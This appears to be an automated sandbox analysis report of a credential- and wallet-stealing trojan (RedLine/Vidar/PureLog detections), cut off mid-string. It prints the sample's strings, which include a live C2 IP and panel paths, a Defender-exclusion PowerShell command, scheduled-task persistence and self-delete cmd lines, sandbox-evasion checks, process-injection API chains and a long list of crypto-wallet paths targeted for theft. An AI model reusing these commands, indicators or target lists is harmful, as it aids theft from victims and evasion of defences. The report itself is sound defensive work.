Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SbieDll.dllcmdvrt32.dllcmdvrt64.dllSxIn.dllcuckoomon.dllkernel32.dllwine_get_unix_file_nameSelect * from Win32_ComputerSystemManufacturerModelmicrosoft corporationVIRTUALvmwareballoon.netkvm.vioinputviofs.vioser.vmbusVMBusHIDhyperkbdJohn DoeMillermalwareCurrentUserSandboxJohnsonWDAGUtilityAccountVBoxMouse.VBoxGuest.VBoxSF.VBoxVideo.vmmouse.vboxogl.dllVMwareOracleVirtualBox Guest AdditionsvboxserviceVGAuthServicevmusrvcqemu-gaSELECT FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULLPNPDeviceIDACPI\PNP0501ACPI\PNP0502sysCritical Error1powershellrunas -Command Add-MpPreference -ExclusionPath '{0}'On0\screen.jpgscreen\.jpghashcum/get.phpPOST15sec30secrandom/zima.php?mine=ifelsexmrverusxmr+verusravenetcverus+ravenverus+etcxmr+ravenxmr+etcautoabcdefghjklmnoWin32_ProcessorProcessorId-Win32_BIOSSerialNumberWin32_DiskDriveSignatureWin32_BaseBoardWin32_VideoControllerNamex20x0000100x0000110x0000120x0000130x0000140x0000150x0000160x0000170x0000180x0000190x0000200x0000210x000022Select * from Win32_ProcessorNumberOfCoresPhormMid.croot\CIMV2SELECT Name FROM Win32_ProcessorUnknown.SELECT TotalPhysicalMemory FROM Win32_ComputerSystemTotalPhysicalMemoryMBSELECT * FROM Win32_VideoControllerAdapterRam bytes, Caption{0} \| {1}amdnvidiaintel(r){1}.root\SecurityCenterroot\SecurityCenter2SELECT * FROM AntivirusProductdisplayName, nonecpugpuramtagifelseldav/beep.phpfilezidBEBRIK.php.bat@echo offtimeout 3 > NULSTART "" ""CD DEL "" /f /qSoftware\Microsoft\Windows\CurrentVersion\Run\c2NodGFza3MuZXhl/create /sc MINUTE /mo 3 /tn "" /tr "" /fcmd/c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "/zima.php?mine=loader;yesnoSELECT CommandLine FROM Win32_Process WHERE ProcessId = CommandLineWin64uninstall.datMaZriCy9x3PTU2izdrO5UXbB6/ak0/HTSOSORRY.phpEOK.phpTOKYO.phpCHECK.phpOperaApp.datopera.datoperaupdater.datfirefox.dathelper.datZUHAN.exeWinForm.csZUHAN1264417905Program.csgetIQZuTsZDjUKE1BSBeT3eI2eNppHhTxrWHVRLTV+qqKRJfXz5YF6S4CcPXuxRE4gseXBURQy1iXbjM+H+NKkuXWDRKMShJJwZCKO9RytWz/5ZdYLrQZyzku1AQmyRjIiC5e1eA04pvrZro/7AHRKiZQ==Ybm4nNGEQQFuiwzVAnwg2oKZNBNG1Pg7s41+NkV0iE1YLnnXKndzwHC9OqR3X989tOJKaX+Vqz8j9MEC90wkEdp6Jf6k5I0KUs3KC3p7w5HWUIy2VybMXlvQVOxy4hzSkF6rsY8Edb9JvHItI1ogEBe7LPINPvdCPlNO7bA9H4pUee1omVXibOAxodmcNZYXh2WBLTmBMLyziyryS2x1W2sHQjv9mELHoexPN0wVwTzPMNWfit4EsVd8kbOQvN+cwz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtHw2jI1/J5uqNjl+XNnJzxlRomyc3pN0Hg+S0i2F7Y4wHxX4HTFFK4TLiGGe9ieHVQfUtXCXgEKIPb3qa29LGsg==[CHECK]http://185.209.162.40/apocalypseRussia,Georgia,Belarus,Armenia,Russia,Belarus,Azerbaijan,Kazakhstan,Kyrgyzstan,Armenia,Uzbekistan,Tajikistan Ef+uVd02PT3LwIeMBag5ow==onvbc.exe/zima.php?mine=XMR/zima.php?mine=OTHERgeneratorgenapzxdatid=application/x-www-form-urlencoded//RegSvcs.exe/zima.php?mine=RAVENngen.exe/zima.php?mine=ETC
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxmouse.sys@n
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Gb
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: c:\program files\vmware
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\swqyH
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxGuest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxSF.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxguest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmmouse.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vboxsf.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62219 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00F62219

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_004185A0

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F674F4 mov ecx, dword ptr fs:[00000030h]		0_2_00F674F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6BC8B mov eax, dword ptr fs:[00000030h]		0_2_00F6BC8B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F6C701 GetProcessHeap,

0_2_00F6C701

Enables debug privileges

Source: C:\ProgramData\CAFIJKFHIJ.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F62219 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F62219
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F62375 SetUnhandledExceptionFilter,	0_2_00F62375
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F64A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F64A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F61D93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F61D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041A68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F768 SetUnhandledExceptionFilter,	3_2_0041F768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041BBB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6C82B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C82B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6C9DAC62

Source: C:\ProgramData\CAFIJKFHIJ.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00FAE7B5 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_00FAE7B5

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

3_2_00411BD0

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1022008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62485 cpuid

0_2_00F62485

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		3_2_00410370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,LocalFree,		3_2_004103E9

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\CAFIJKFHIJ.exe	Queries volume information: C:\ProgramData\CAFIJKFHIJ.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Code function: 0_2_00F62106 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00F62106

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410220

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410300

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet 